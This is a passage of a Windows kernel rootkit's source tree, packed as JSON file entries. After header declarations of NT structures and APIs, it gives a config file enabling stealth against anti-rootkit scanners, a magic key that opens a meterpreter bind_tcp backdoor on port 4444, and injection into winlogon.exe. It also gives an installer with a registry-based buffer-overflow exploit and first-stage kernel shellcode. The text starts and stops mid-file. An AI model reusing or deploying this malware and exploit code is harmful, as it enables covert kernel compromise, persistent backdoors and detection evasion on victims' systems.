AllocationSize;\r\n ULONG FileAttributes;\r\n ULONG FileNameLength;\r\n ULONG EaInformationLength;\r\n UCHAR AlternateNameLength;\r\n WCHAR AlternateName[12];\r\n WCHAR FileName[1];\r\n\r\n} FILE_BOTH_DIRECTORY_INFORMATION, \r\n*PFILE_BOTH_DIRECTORY_INFORMATION; \r\n\r\ntypedef struct _FILE_NAMES_INFORMATION\r\n{\r\n ULONG NextEntryOffset;\r\n ULONG FileIndex;\r\n ULONG FileNameLength;\r\n WCHAR FileName[1];\r\n\r\n} FILE_NAMES_INFORMATION, \r\n*PFILE_NAMES_INFORMATION;\r\n\r\ntypedef struct _FILE_ID_BOTH_DIRECTORY_INFORMATION \r\n{\r\n ULONG NextEntryOffset;\r\n ULONG FileIndex;\r\n LARGE_INTEGER CreationTime;\r\n LARGE_INTEGER LastAccessTime;\r\n LARGE_INTEGER LastWriteTime;\r\n LARGE_INTEGER ChangeTime;\r\n LARGE_INTEGER EndOfFile;\r\n LARGE_INTEGER AllocationSize;\r\n ULONG FileAttributes;\r\n ULONG FileNameLength;\r\n ULONG EaSize;\r\n CCHAR ShortNameLength;\r\n WCHAR ShortName[12];\r\n LARGE_INTEGER FileId;\r\n WCHAR FileName[1];\r\n\r\n} FILE_ID_BOTH_DIRECTORY_INFORMATION, \r\n*PFILE_ID_BOTH_DIRECTORY_INFORMATION;\r\n\r\ntypedef struct _FILE_ID_FULL_DIRECTORY_INFORMATION \r\n{\r\n ULONG NextEntryOffset;\r\n ULONG FileIndex;\r\n LARGE_INTEGER CreationTime;\r\n LARGE_INTEGER LastAccessTime;\r\n LARGE_INTEGER LastWriteTime;\r\n LARGE_INTEGER ChangeTime;\r\n LARGE_INTEGER EndOfFile;\r\n LARGE_INTEGER AllocationSize;\r\n ULONG FileAttributes;\r\n ULONG FileNameLength;\r\n ULONG EaSize;\r\n LARGE_INTEGER FileId;\r\n WCHAR FileName[1];\r\n\r\n} FILE_ID_FULL_DIRECTORY_INFORMATION, \r\n*PFILE_ID_FULL_DIRECTORY_INFORMATION; \r\n\r\ntypedef struct _SYSTEM_OBJECT_TYPE_INFORMATION \r\n{\r\n ULONG NextEntryOffset;\r\n ULONG ObjectCount;\r\n ULONG HandleCount;\r\n ULONG TypeNumber;\r\n ULONG InvalidAttributes;\r\n GENERIC_MAPPING GenericMapping;\r\n ACCESS_MASK ValidAccessMask;\r\n POOL_TYPE PoolType;\r\n UCHAR Unknown;\r\n UNICODE_STRING Name;\r\n\r\n} SYSTEM_OBJECT_TYPE_INFORMATION, \r\n*PSYSTEM_OBJECT_TYPE_INFORMATION; \r\n\r\ntypedef struct _SYSTEM_OBJECT_INFORMATION \r\n{\r\n ULONG NextEntryOffset;\r\n PVOID Object;\r\n ULONG CreatorProcessId;\r\n USHORT Unknown;\r\n USHORT Flags;\r\n ULONG PointerCount;\r\n ULONG HandleCount;\r\n ULONG PagedPoolUsage;\r\n ULONG NonPagedPoolUsage;\r\n ULONG ExclusiveProcessId;\r\n PSECURITY_DESCRIPTOR SecurityDescriptor;\r\n UNICODE_STRING Name;\r\n\r\n} SYSTEM_OBJECT_INFORMATION, \r\n*PSYSTEM_OBJECT_INFORMATION;\r\n\r\nNTSYSAPI \r\nNTSTATUS \r\nNTAPI \r\nZwQueryDirectoryFile(\r\n HANDLE FileHandle, \r\n HANDLE Event, \r\n PIO_APC_ROUTINE ApcRoutine, \r\n PVOID ApcContext,\r\n PIO_STATUS_BLOCK IoStatusBlock, \r\n PVOID FileInformation, \r\n ULONG FileInformationLength, \r\n FILE_INFORMATION_CLASS FileInformationClass,\r\n BOOLEAN ReturnSingleEntry, \r\n PUNICODE_STRING FileName, \r\n BOOLEAN RestartScan\r\n);\r\n\r\ntypedef struct _SYSTEM_PROCESS_INFORMATION \r\n{\r\n ULONG NextEntryOffset;\r\n ULONG NumberOfThreads;\r\n LARGE_INTEGER SpareLi1;\r\n LARGE_INTEGER SpareLi2;\r\n LARGE_INTEGER SpareLi3;\r\n LARGE_INTEGER CreateTime;\r\n LARGE_INTEGER UserTime;\r\n LARGE_INTEGER KernelTime;\r\n UNICODE_STRING ImageName;\r\n KPRIORITY BasePriority;\r\n HANDLE UniqueProcessId;\r\n HANDLE InheritedFromUniqueProcessId;\r\n ULONG HandleCount;\r\n ULONG SessionId;\r\n ULONG_PTR PageDirectoryBase;\r\n SIZE_T PeakVirtualSize;\r\n SIZE_T VirtualSize;\r\n ULONG PageFaultCount;\r\n SIZE_T PeakWorkingSetSize;\r\n SIZE_T WorkingSetSize;\r\n SIZE_T QuotaPeakPagedPoolUsage;\r\n SIZE_T QuotaPagedPoolUsage;\r\n SIZE_T QuotaPeakNonPagedPoolUsage;\r\n SIZE_T QuotaNonPagedPoolUsage;\r\n SIZE_T PagefileUsage;\r\n SIZE_T PeakPagefileUsage;\r\n SIZE_T PrivatePageCount;\r\n LARGE_INTEGER ReadOperationCount;\r\n LARGE_INTEGER WriteOperationCount;\r\n LARGE_INTEGER OtherOperationCount;\r\n LARGE_INTEGER ReadTransferCount;\r\n LARGE_INTEGER WriteTransferCount;\r\n LARGE_INTEGER OtherTransferCount;\r\n\r\n} SYSTEM_PROCESS_INFORMATION, \r\n*PSYSTEM_PROCESS_INFORMATION;\r\n\r\n\r\ntypedef struct THREAD_BASIC_INFORMATION\r\n{\r\n NTSTATUS ExitStatus;\r\n PVOID TebBaseAddress;\r\n CLIENT_ID ClientId;\r\n KAFFINITY AffinityMask;\r\n KPRIORITY Priority;\r\n KPRIORITY BasePriority;\r\n\r\n} THREAD_BASIC_INFORMATION,\r\n*PTHREAD_BASIC_INFORMATION;\r\n\r\ntypedef enum\r\n{\r\n StateInitialized,\r\n StateReady,\r\n StateRunning,\r\n StateStandby,\r\n StateTerminated,\r\n StateWait,\r\n StateTransition,\r\n StateUnknown\r\n\r\n} THREAD_STATE;\r\n\r\ntypedef struct _SYSTEM_THREAD \r\n{\r\n LARGE_INTEGER KernelTime;\r\n LARGE_INTEGER UserTime;\r\n LARGE_INTEGER CreateTime;\r\n ULONG WaitTime;\r\n PVOID StartAddress;\r\n CLIENT_ID ClientId;\r\n KPRIORITY Priority;\r\n KPRIORITY BasePriority;\r\n ULONG ContextSwitchCount;\r\n THREAD_STATE State;\r\n KWAIT_REASON WaitReason;\r\n\r\n} SYSTEM_THREAD, \r\n*PSYSTEM_THREAD;\r\n\r\ntypedef struct _SYSTEM_PROCESSES_INFORMATION\r\n{\r\n ULONG NextEntryDelta;\r\n ULONG ThreadCount;\r\n ULONG Reserved1[6];\r\n LARGE_INTEGER CreateTime;\r\n LARGE_INTEGER UserTime;\r\n LARGE_INTEGER KernelTime;\r\n UNICODE_STRING ProcessName; \r\n KPRIORITY BasePriority;\r\n ULONG ProcessId;\r\n ULONG InheritedFromProcessId;\r\n ULONG HandleCount;\r\n ULONG Reserved2[2];\r\n VM_COUNTERS VmCounters;\r\n IO_COUNTERS IoCounters;\r\n SYSTEM_THREAD Threads[1];\r\n\r\n} SYSTEM_PROCESSES_INFORMATION, \r\n*PSYSTEM_PROCESSES_INFORMATION;\r\n\r\nNTSYSAPI \r\nNTSTATUS \r\nNTAPI \r\nZwQuerySystemInformation(\r\n SYSTEM_INFORMATION_CLASS SystemInformationClass,\r\n PVOID SystemInformation,\r\n ULONG SystemInformationLength,\r\n PULONG ReturnLength\r\n);\r\n\r\nNTSYSAPI\r\nNTSTATUS\r\nNTAPI\r\nZwQueryInformationProcess(\r\n HANDLE ProcessHandle,\r\n PROCESSINFOCLASS ProcessInformationClass,\r\n PVOID ProcessInformation,\r\n ULONG ProcessInformationLength,\r\n PULONG ReturnLength\r\n);\r\n\r\nNTSYSAPI\r\nNTSTATUS\r\nNTAPI\r\nZwAllocateVirtualMemory(\r\n HANDLE ProcessHandle,\r\n PVOID *BaseAddress,\r\n ULONG ZeroBits,\r\n PULONG AllocationSize,\r\n ULONG AllocationType,\r\n ULONG Protect\r\n);\r\n\r\nNTSYSAPI\r\nNTSTATUS\r\nNTAPI\r\nZwFreeVirtualMemory(\r\n HANDLE ProcessHandle,\r\n PVOID *BaseAddress,\r\n PULONG FreeSize,\r\n ULONG FreeType\r\n);\r\n\r\nNTSYSAPI \r\nNTSTATUS \r\nNTAPI \r\nZwOpenThread(\r\n PHANDLE ThreadHandle,\r\n ACCESS_MASK DesiredAccess,\r\n POBJECT_ATTRIBUTES ObjectAttributes,\r\n PCLIENT_ID ClientId\r\n);\r\n\r\nNTSYSAPI \r\nNTSTATUS \r\nNTAPI \r\nZwDeviceIoControlFile(\r\n HANDLE FileHandle,\r\n HANDLE Event,\r\n PIO_APC_ROUTINE ApcRoutine,\r\n PVOID ApcContext,\r\n PIO_STATUS_BLOCK IoStatusBlock,\r\n ULONG IoControlCode,\r\n PVOID InputBuffer,\r\n ULONG InputBufferLength,\r\n PVOID OutputBuffer,\r\n ULONG OutputBufferLength\r\n); \r\n\r\nNTSYSAPI \r\nNTSTATUS \r\nNTAPI\r\nZwFsControlFile(\r\n HANDLE FileHandle,\r\n HANDLE Event OPTIONAL,\r\n PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n PVOID ApcContext OPTIONAL,\r\n PIO_STATUS_BLOCK IoStatusBlock,\r\n ULONG FsControlCode,\r\n PVOID InputBuffer OPTIONAL,\r\n ULONG InputBufferLength,\r\n PVOID OutputBuffer OPTIONAL,\r\n ULONG OutputBufferLength\r\n);\r\n\r\nNTSYSAPI \r\nNTSTATUS\r\nNTAPI\r\nZwSaveKey(\r\n HANDLE KeyHandle,\r\n HANDLE FileHandle\r\n); \r\n\r\nNTSYSAPI \r\nNTSTATUS\r\nNTAPI\r\nZwQueryVolumeInformationFile(\r\n HANDLE FileHandle,\r\n PIO_STATUS_BLOCK IoStatusBlock,\r\n PVOID FsInformation,\r\n ULONG Length,\r\n FS_INFORMATION_CLASS FsInformationClass\r\n); \r\n\r\nNTSYSAPI \r\nNTSTATUS\r\nNTAPI\r\nZwQuerySecurityObject(\r\n HANDLE Handle,\r\n SECURITY_INFORMATION SecurityInformation,\r\n PSECURITY_DESCRIPTOR SecurityDescriptor,\r\n ULONG Length,\r\n PULONG LengthNeeded\r\n);\r\n\r\nNTSYSAPI \r\nNTSTATUS\r\nNTAPI\r\nZwSetSecurityObject(\r\n HANDLE Handle,\r\n SECURITY_INFORMATION SecurityInformation,\r\n PSECURITY_DESCRIPTOR SecurityDescriptor\r\n); \r\n\r\n\r\nNTSYSAPI \r\nNTSTATUS\r\nNTAPI\r\nZwDuplicateObject(\r\n HANDLE SourceProcessHandle,\r\n HANDLE SourceHandle,\r\n HANDLE TargetProcessHandle,\r\n PHANDLE TargetHandle,\r\n ACCESS_MASK DesiredAccess,\r\n ULONG HandleAttributes,\r\n ULONG Options\r\n);\r\n\r\nNTSYSAPI \r\nNTSTATUS\r\nNTAPI\r\nZwCreateEvent(\r\n PHANDLE EventHandle,\r\n ACCESS_MASK DesiredAccess,\r\n POBJECT_ATTRIBUTES ObjectAttributes,\r\n EVENT_TYPE EventType,\r\n BOOLEAN InitialState\r\n);\r\n\r\nNTSYSAPI \r\nNTSTATUS\r\nNTAPI\r\nZwWaitForSingleObject(\r\n HANDLE Handle,\r\n BOOLEAN Alertable,\r\n PLARGE_INTEGER Timeout\r\n);\r\n\r\nNTSYSAPI \r\nNTSTATUS\r\nNTAPI\r\nRtlGetDaclSecurityDescriptor(\r\n PSECURITY_DESCRIPTOR SecurityDescriptor,\r\n PBOOLEAN DaclPresent,\r\n PACL *Dacl,\r\n PBOOLEAN DaclDefaulted\r\n);\r\n\r\n#ifndef __wtypes_h__\r\n\r\ntypedef struct _SID_IDENTIFIER_AUTHORITY\r\n{\r\n UCHAR Value[ 6 ];\r\n\r\n} SID_IDENTIFIER_AUTHORITY;\r\n\r\ntypedef struct _SID_IDENTIFIER_AUTHORITY *PSID_IDENTIFIER_AUTHORITY;\r\n\r\n#endif\r\n\r\nNTSYSAPI \r\nNTSTATUS\r\nNTAPI\r\nRtlInitializeSid(\r\n PSID Sid,\r\n PSID_IDENTIFIER_AUTHORITY IdentifierAuthority,\r\n UCHAR SubAuthorityCount\r\n); \r\n\r\nNTSYSAPI \r\nULONG\r\nNTAPI\r\nRtlLengthSid(\r\n PSID Sid\r\n); \r\n\r\nNTSYSAPI \r\nNTSTATUS\r\nNTAPI\r\nRtlAddAccessAllowedAce(\r\n PACL Acl,\r\n ULONG AceRevision,\r\n ACCESS_MASK AccessMask,\r\n PSID Sid\r\n);\r\n\r\nNTSYSAPI \r\nNTSTATUS\r\nNTAPI\r\nRtlSetDaclSecurityDescriptor(\r\n OUT PSECURITY_DESCRIPTOR SecurityDescriptor,\r\n BOOLEAN DaclPresent,\r\n PACL Dacl,\r\n BOOLEAN DaclDefaulted\r\n);\r\n\r\nNTSYSAPI \r\nNTSTATUS\r\nNTAPI\r\nRtlSelfRelativeToAbsoluteSD2(\r\n PSECURITY_DESCRIPTOR pSelfRelativeSecurityDescriptor,\r\n PULONG pBufferSize\r\n); \r\n\r\nNTSYSAPI \r\nBOOLEAN\r\nNTAPI\r\nRtlValidSid(\r\n PSID Sid\r\n); \r\n\r\ntypedef struct _KAPC_STATE \r\n{\r\n LIST_ENTRY ApcListHead[2];\r\n PVOID Process;\r\n BOOLEAN KernelApcInProgress;\r\n BOOLEAN KernelApcPending;\r\n BOOLEAN UserApcPending;\r\n\r\n} KAPC_STATE, \r\n*PKAPC_STATE;\r\n\r\nNTSYSAPI\r\nVOID\r\nNTAPI \r\nKeStackAttachProcess(\r\n PEPROCESS Process,\r\n PKAPC_STATE ApcState\r\n);\r\n\r\nNTSYSAPI\r\nVOID\r\nNTAPI\r\nKeUnstackDetachProcess(\r\n PKAPC_STATE ApcState\r\n);\r\n\r\nNTSYSAPI\r\nNTSTATUS\r\nNTAPI\r\nPsLookupProcessByProcessId(\r\n HANDLE ProcessId,\r\n PEPROCESS *Process\r\n);\r\n\r\nNTSYSAPI\r\nNTSTATUS\r\nNTAPI\r\nPsLookupThreadByThreadId(\r\n HANDLE ThreadId,\r\n PETHREAD *Thread\r\n);\r\n\r\n\r\nNTSYSAPI\r\nNTSTATUS\r\nNTAPI\r\nObOpenObjectByPointer(\r\n PVOID Object,\r\n ULONG HandleAttributes,\r\n PACCESS_STATE PassedAccessState,\r\n ACCESS_MASK DesiredAccess,\r\n POBJECT_TYPE ObjectType,\r\n KPROCESSOR_MODE AccessMode,\r\n PHANDLE Handle\r\n);\r\n\r\nNTSYSAPI\r\nNTSTATUS\r\nNTAPI\r\nObOpenObjectByName(\r\n POBJECT_ATTRIBUTES ObjectAttributes,\r\n POBJECT_TYPE ObjectType, \r\n KPROCESSOR_MODE AccessMode,\r\n PACCESS_STATE AccessState, \r\n ACCESS_MASK DesiredAccess,\r\n PVOID ParseContext, \r\n PHANDLE Handle\r\n);\r\n\r\nNTSYSAPI\r\nNTSTATUS\r\nNTAPI\r\nObReferenceObjectByName(\r\n PUNICODE_STRING ObjectPath,\r\n ULONG Attributes,\r\n PACCESS_STATE PassedAccessState,\r\n ACCESS_MASK DesiredAccess,\r\n POBJECT_TYPE ObjectType,\r\n KPROCESSOR_MODE AccessMode,\r\n PVOID ParseContext,\r\n PVOID *ObjectPtr\r\n);\r\n\r\nNTKERNELAPI \r\nNTSTATUS \r\nObQueryNameString(\r\n PVOID Object,\r\n POBJECT_NAME_INFORMATION ObjectNameInfo,\r\n ULONG Length,\r\n PULONG ReturnLength\r\n);\r\n\r\nNTKERNELAPI\r\nVOID\r\nKeSetSystemAffinityThread(\r\n KAFFINITY Affinity\r\n);\r\n\r\ntypedef enum\r\n{\r\n OriginalApcEnvironment,\r\n AttachedApcEnvironment,\r\n CurrentApcEnvironment\r\n\r\n} KAPC_ENVIRONMENT;\r\n\r\nNTKERNELAPI\r\nVOID\r\nKeInitializeApc(\r\n PRKAPC Apc,\r\n PRKTHREAD Thread,\r\n KAPC_ENVIRONMENT Environment,\r\n PKKERNEL_ROUTINE KernelRoutine,\r\n PKRUNDOWN_ROUTINE RundownRoutine,\r\n PKNORMAL_ROUTINE NormalRoutine,\r\n KPROCESSOR_MODE ApcMode,\r\n PVOID NormalContext\r\n);\r\n\r\nNTKERNELAPI\r\nBOOLEAN\r\nKeInsertQueueApc(\r\n PKAPC Apc,\r\n PVOID SystemArgument1,\r\n PVOID SystemArgument2,\r\n KPRIORITY Increment\r\n);\r\n" }, { "path": "src/rootkit_driver_config.h", "content": "\r\n\r\n/**\r\n * Hide rootkit executable memory in discardable sections to avoid \r\n * 'hiiden code' detection from different anti-rootkits.\r\n */\r\n#define USE_STEALTH_IMAGE\r\n\r\n/**\r\n * Magic sequence that activates meterpreter/bind_tcp backdoor on 4444 port.\r\n * Use rootkit_ping.py script for communicating with the infected target.\r\n */\r\n#define ROOTKIT_CTL_KEY \"7C5E3380\"\r\n\r\n/**\r\n * Process to inject meterpreter DLL.\r\n */\r\n#define METERPRETER_PROCESS L\"winlogon.exe\"\r\n" }, { "path": "src/rootkit_installer/rootkit_installer.cpp", "content": "#include \"stdafx.h\"\r\n\r\n#define EMIT(_data_) __asm __emit _data_\r\n#define _ __asm __emit\r\n\r\n#define ENDM 'DNE~'\r\n\r\n#ifdef USE_DEBUG_DRIVER\r\n#include \"../includes/rootkit_driver_debug.sys.h\"\r\n#else\r\n#include \"../includes/rootkit_driver.sys.h\"\r\n#endif\r\n\r\n// buffer lengt and return address offset\r\n#define BOF_MIN_LENGTH (0x05 * sizeof(PVOID))\r\n#define BOF_RET_OFFSET (BOF_MIN_LENGTH - sizeof(PVOID))\r\n\r\n// registry key and value name for malformed exploit data + 1-st shellcode\r\n#define EXPL_KEY \"Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\FontLink\"\r\n#define EXPL_VAL \"FontLinkDefaultChar\"\r\n\r\n#define SC2_KEY \"System\\\\CurrentControlSet\\\\Control\"\r\n#define SC2_VAL \"Configuration Data\"\r\n\r\n/** \r\n * Name of registry value in System\\CurrentControlSet\\Control, to store\r\n * rootkit driver image.\r\n */\r\n#define DRV_VAL \"PCI\"\r\n\r\n// Define the page size for the Intel 386 as 4096 (0x1000).\r\n#define PAGE_SIZE 0x1000\r\n\r\n/**\r\n * OS sensitive addresses and offsets.\r\n */ \r\n\r\n// magic address of JMP ESP for Windows 7 SP0-SP1\r\n#define JMP_ESP_ADDR 0xffdf04c7\r\n\r\n// offset of _KPCR::KdVersionBlock\r\n#define KPCR_KdVersionBlock 0x34\r\n#define KPCR_SelfPcr 0x1c\r\n#define PROCESSINFO_Flags 0x08\r\n\r\n#define WIN32_PROCESS_FLAGS 0x20040010\r\n\r\n/**\r\n * Virtual address inside of %SystemRoot%\\Config\\SYSTEM registry\r\n * hive, that mapped into the kernel memory.\r\n */\r\n#define REG_HIVE_ADDRESS 0x8d100000\r\n\r\n#define REG_SIGN_1 '\\x40\\x50\\x41\\x51'\r\n#define REG_SIGN_FULL \"\\x40\\x50\\x41\\x51\\x90\"\r\n\r\nBOOL m_DebugBreaks = TRUE;\r\n//--------------------------------------------------------------------------------------\r\nBOOL LoadPrivileges(char *lpszName)\r\n{\r\n HANDLE hToken = NULL;\r\n LUID Val;\r\n TOKEN_PRIVILEGES tp;\r\n BOOL bRet = FALSE;\r\n\r\n if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) \r\n {\r\n DbgMsg(__FILE__, __LINE__, \"OpenProcessToken() fails: error %d\\n\", GetLastError());\r\n goto end;\r\n }\r\n\r\n if (!LookupPrivilegeValueA(NULL, lpszName, &Val))\r\n {\r\n DbgMsg(__FILE__, __LINE__, \"LookupPrivilegeValue() fails: error %d\\n\", GetLastError());\r\n goto end;\r\n }\r\n\r\n tp.PrivilegeCount = 1;\r\n tp.Privileges[0].Luid = Val;\r\n tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;\r\n\r\n if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof (tp), NULL, NULL))\r\n {\r\n DbgMsg(__FILE__, __LINE__, \"AdjustTokenPrivileges() fails: error %d\\n\", GetLastError());\r\n goto end;\r\n }\r\n\r\n bRet = TRUE;\r\n\r\nend:\r\n if (hToken)\r\n {\r\n CloseHandle(hToken);\r\n }\r\n\r\n return bRet;\r\n} \r\n//--------------------------------------------------------------------------------------\r\nPVOID GetSysInf(SYSTEM_INFORMATION_CLASS InfoClass)\r\n{\r\n NTSTATUS ns = 0;\r\n ULONG RetSize = 0, Size = 0x100;\r\n PVOID Info = NULL;\r\n\r\n GET_NATIVE(NtQuerySystemInformation);\r\n\r\n while (true) \r\n { \r\n // allocate memory for system information\r\n if ((Info = LocalAlloc(LMEM_FIXED | LMEM_ZEROINIT, Size)) == NULL) \r\n {\r\n DbgMsg(__FILE__, __LINE__, \"LocalAlloc() fails\\n\");\r\n return NULL;\r\n }\r\n\r\n // query information\r\n RetSize = 0;\r\n ns = f_NtQuerySystemInformation(InfoClass, Info, Size, &RetSize);\r\n if (ns == STATUS_INFO_LENGTH_MISMATCH)\r\n { \r\n // buffer is too small\r\n LocalFree(Info);\r\n Info = NULL;\r\n\r\n if (RetSize > 0)\r\n {\r\n // allocate more memory and try again\r\n Size = RetSize + 0x100;\r\n } \r\n else\r\n {\r\n break;\r\n }\r\n }\r\n else\r\n {\r\n break;\r\n }\r\n }\r\n\r\n if (!NT_SUCCESS(ns))\r\n {\r\n DbgMsg(__FILE__, __LINE__, \"NtQuerySystemInformation() fails; status: 0x%.8x\\n\", ns);\r\n\r\n if (Info)\r\n {\r\n LocalFree(Info);\r\n }\r\n\r\n return NULL;\r\n }\r\n\r\n return Info;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nPVOID KernelGetModuleBase(char *ModuleName, char *ModulePath, SIZE_T ModulePathLen)\r\n{\r\n PVOID pModuleBase = NULL;\r\n UNICODE_STRING usCommonHalName, usCommonNtName;\r\n\r\n GET_NATIVE(RtlInitUnicodeString);\r\n GET_NATIVE(RtlAnsiStringToUnicodeString);\r\n GET_NATIVE(RtlInitAnsiString);\r\n GET_NATIVE(RtlEqualUnicodeString);\r\n GET_NATIVE(RtlFreeUnicodeString);\r\n\r\n f_RtlInitUnicodeString(&usCommonHalName, L\"hal.dll\");\r\n f_RtlInitUnicodeString(&usCommonNtName, L\"ntoskrnl.exe\");\r\n\r\n #define HAL_NAMES_NUM 6\r\n wchar_t *wcHalNames[] = \r\n {\r\n L\"hal.dll\", // Non-ACPI PIC HAL \r\n L\"halacpi.dll\", // ACPI PIC HAL\r\n L\"halapic.dll\", // Non-ACPI APIC UP HAL\r\n L\"halmps.dll\", // Non-ACPI APIC MP HAL\r\n L\"halaacpi.dll\", // ACPI APIC UP HAL\r\n L\"halmacpi.dll\" // ACPI APIC MP HAL\r\n };\r\n\r\n #define NT_NAMES_NUM 4\r\n wchar_t *wcNtNames[] = \r\n {\r\n L\"ntoskrnl.exe\", // UP\r\n L\"ntkrnlpa.exe\", // UP PAE\r\n L\"ntkrnlmp.exe\", // MP\r\n L\"ntkrpamp.exe\" // MP PAE\r\n };\r\n\r\n PRTL_PROCESS_MODULES Info = (PRTL_PROCESS_MODULES)GetSysInf(SystemModuleInformation);\r\n if (Info)\r\n {\r\n ANSI_STRING asModuleName;\r\n UNICODE_STRING usModuleName;\r\n\r\n f_RtlInitAnsiString(&asModuleName, ModuleName);\r\n\r\n NTSTATUS ns = f_RtlAnsiStringToUnicodeString(&usModuleName, &asModuleName, TRUE);\r\n if (NT_SUCCESS(ns))\r\n {\r\n for (ULONG i = 0; i < Info->NumberOfModules; i++)\r\n {\r\n ANSI_STRING asEnumModuleName;\r\n UNICODE_STRING usEnumModuleName;\r\n\r\n f_RtlInitAnsiString(\r\n &asEnumModuleName, \r\n (char *)Info->Modules[i].FullPathName + Info->Modules[i].OffsetToFileName\r\n );\r\n\r\n NTSTATUS ns = f_RtlAnsiStringToUnicodeString(&usEnumModuleName, &asEnumModuleName, TRUE);\r\n if (NT_SUCCESS(ns))\r\n { \r\n if (f_RtlEqualUnicodeString(&usModuleName, &usCommonHalName, TRUE))\r\n {\r\n // hal.dll passed as module name\r\n for (int i_m = 0; i_m < HAL_NAMES_NUM; i_m++)\r\n {\r\n UNICODE_STRING usHalName;\r\n f_RtlInitUnicodeString(&usHalName, wcHalNames[i_m]);\r\n\r\n // compare module name from list with known HAL module name\r\n if (f_RtlEqualUnicodeString(&usEnumModuleName, &usHalName, TRUE))\r\n {\r\n lstrcpyn(ModulePath, asEnumModuleName.Buffer, (int)ModulePathLen);\r\n pModuleBase = (PVOID)Info->Modules[i].ImageBase;\r\n break;\r\n }\r\n }\r\n }\r\n else if (f_RtlEqualUnicodeString(&usModuleName, &usCommonNtName, TRUE))\r\n {\r\n // ntoskrnl.exe passed as module name\r\n for (int i_m = 0; i_m < NT_NAMES_NUM; i_m++)\r\n {\r\n UNICODE_STRING usNtName;\r\n f_RtlInitUnicodeString(&usNtName, wcNtNames[i_m]);\r\n\r\n // compare module name from list with known kernel module name\r\n if (f_RtlEqualUnicodeString(&usEnumModuleName, &usNtName, TRUE))\r\n {\r\n lstrcpyn(ModulePath, asEnumModuleName.Buffer, (int)ModulePathLen);\r\n pModuleBase = (PVOID)Info->Modules[i].ImageBase;\r\n break;\r\n }\r\n }\r\n }\r\n else if (f_RtlEqualUnicodeString(&usModuleName, &usEnumModuleName, TRUE))\r\n {\r\n lstrcpyn(ModulePath, asEnumModuleName.Buffer, (int)ModulePathLen);\r\n pModuleBase = (PVOID)Info->Modules[i].ImageBase;\r\n }\r\n\r\n f_RtlFreeUnicodeString(&usEnumModuleName);\r\n\r\n if (pModuleBase)\r\n {\r\n // module is found\r\n break;\r\n }\r\n } \r\n } \r\n\r\n f_RtlFreeUnicodeString(&usModuleName);\r\n } \r\n\r\n LocalFree(Info);\r\n }\r\n\r\n return pModuleBase;\r\n}\r\n//--------------------------------------------------------------------------------------\r\n#define GetKernelProcAddr(_proc_) GetKernelProcAddrEx(\"ntoskrnl.exe\", (_proc_), FALSE)\r\n#define GetHalProcAddr(_proc_) GetKernelProcAddrEx(\"hal.dll\", (_proc_), FALSE)\r\n#define GetKernelProcOffset(_proc_) GetKernelProcAddrEx(\"ntoskrnl.exe\", (_proc_), TRUE)\r\n#define GetHalProcOffset(_proc_) GetKernelProcAddrEx(\"hal.dll\", (_proc_), TRUE)\r\n\r\nPVOID GetKernelProcAddrEx(char *lpszModuleName, char *lpszProcName, BOOL bOffset)\r\n{\r\n PVOID Addr = NULL;\r\n \r\n // get kernel module address and file path\r\n char szModulePath[MAX_PATH];\r\n PVOID ModuleBase = KernelGetModuleBase(lpszModuleName, szModulePath, MAX_PATH);\r\n if (ModuleBase)\r\n {\r\n // load kernel image as dynamic library\r\n HMODULE hModule = LoadLibraryExA(szModulePath, 0, DONT_RESOLVE_DLL_REFERENCES);\r\n if (hModule)\r\n {\r\n // get address of target function\r\n Addr = GetProcAddress(hModule, lpszProcName);\r\n if (Addr)\r\n { \r\n if (bOffset)\r\n {\r\n // calculate only function offsset\r\n Addr = (PVOID)((PUCHAR)Addr - (PUCHAR)hModule);\r\n } \r\n else\r\n {\r\n // calculate REAL address of this function\r\n Addr = (PVOID)((PUCHAR)Addr - (PUCHAR)hModule + (PUCHAR)ModuleBase);\r\n }\r\n }\r\n else\r\n {\r\n DbgMsg(__FILE__, __LINE__, \"GetProcAddress() ERROR %d\\n\", GetLastError());\r\n }\r\n\r\n FreeLibrary(hModule);\r\n }\r\n else\r\n {\r\n DbgMsg(__FILE__, __LINE__, \"LoadLibraryEx() ERROR %d\\n\", GetLastError());\r\n }\r\n }\r\n else\r\n {\r\n DbgMsg(__FILE__, __LINE__, __FUNCTION__\"(): Unable to locate \\\"%s\\\" module\\n\", lpszModuleName);\r\n }\r\n\r\n return Addr;\r\n}\r\n//--------------------------------------------------------------------------------------\r\n#define marker_MmIsAddressValid 'Val0'\r\n\r\n__declspec(naked) void Shellcode_1(void)\r\n{\r\n __asm \r\n {\r\n /**\r\n * 1-st STAGE SHELLCODE BEGIN\r\n *\r\n * EBX allways points to the win32k!NtUserInitialize()\r\n *\r\n */\r\n\r\n#ifdef USE_SHELLCODE_DEBUGBREAK\r\n\r\n int 3\r\n#endif\r\n\r\n /** \r\n * Find kernel adderss\r\n */\r\n mov eax, fs:[KPCR_SelfPcr]\r\n mov edi, dword ptr [eax + KPCR_KdVersionBlock] \r\n xor di, di\r\n\r\n_find_kernel:\r\n\r\n cmp word ptr [edi], IMAGE_DOS_SIGNATURE\r\n je _kernel_ok\r\n sub edi, PAGE_SIZE\r\n jmp short _find_kernel\r\n\r\n_kernel_ok:\r\n\r\n // get address of nt!MmIsAddressvalid()\r\n add edi, marker_MmIsAddressValid\r\n\r\n /** \r\n * Find 2-nd shellcode, that has been stored in registry hive,\r\n * in kernel memory.\r\n */\r\n\r\n mov esi, REG_HIVE_ADDRESS\r\n\r\n_loop:\r\n // check for valid address\r\n push esi\r\n call edi\r\n test al, al\r\n jz _no_match\r\n\r\n /** \r\n * Check signature by 8 bytes\r\n */\r\n cmp dword ptr [esi], REG_SIGN_1\r\n jne _no_match\r\n\r\n cmp byte ptr [esi + 4], 0x90\r\n jne _no_match\r\n\r\n // signature matched!\r\n jmp esi\r\n\r\n_no_match:\r\n\r\n add esi, 0x10\r\n jmp short _loop\r\n }\r\n\r\n // end marker\r\n EMIT('~' _ 'E' _ 'N' _ 'D')\r\n}\r\n//--------------------------------------------------------------------------------------\r\n/**\r\n * Constants and flags for RtlQueryRegistryValues()\r\n */\r\n\r\n// RTL_QUERY_REGISTRY_DIRECT | RTL_QUERY_REGISTRY_REQUIRED\r\n#define QUERY_REGISTRY_TABLE_FLAGS 